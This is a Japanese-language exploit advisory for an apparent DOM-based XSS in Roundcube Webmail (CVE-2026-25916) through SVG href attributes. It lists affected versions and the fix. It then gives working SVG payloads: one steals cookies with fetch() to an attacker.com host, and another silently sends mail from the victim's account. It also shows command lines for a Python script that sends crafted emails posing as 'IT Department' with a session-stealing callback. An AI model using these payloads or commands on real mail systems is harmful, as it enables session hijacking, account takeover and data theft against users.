
Python製のエクスプロイトで、SVGのhref属性を介したRoundcube WebmailのDOMベースXSS(CVE-2026-25916)を対象とし、細工されたメールを通じてセッションハイジャックとデータ窃取を可能にします。
エクスプロイトタイトル: Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)
作成者: Mohammed Idrees Banyamer
連絡先: GitHub @mbanyamer | Instagram @banyamer_security
国: ヨルダン
日付: 2026年2月9日
CVE: CVE-2026-25916
タイプ: DOMベースのクロスサイトスクリプティング(XSS)
プラットフォーム: Webアプリケーション
テスト環境: Roundcube 1.6.8、Ubuntu 22.04
CVSSスコア: 6.1(中)
⚠️ 警告: このエクスプロイトは教育目的および許可を得たテスト目的のみで使用してください。
所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
作成者は、不正使用または違法行為について一切の責任を負いません。
Roundcube Webmail 1.6.9より前のバージョンには、SVG処理におけるDOMベースのXSS脆弱性が存在します。このアプリケーションはSVG要素内のhrefおよびxlink:href属性を適切にサニタイズできず、特別に細工されたメールを介してJavaScriptが実行される可能性があります。
影響を受けるバージョン: Roundcube Webmail < 1.6.9
修正バージョン: 1.6.9(コミット 26d7677)
CWE: CWE-79 - Webページ生成時の入力の不適切な無害化
攻撃ベクトル: メール経由のリモート攻撃
影響: セッションハイジャック、アカウント乗っ取り、データ流出
この脆弱性はrcube_washtml.phpに存在し、SVG要素内のhref属性が適切に検証されていませんでした:
<!-- 脆弱なSVG要素 -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u [email protected] \
-w app_password \
-r [email protected] \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"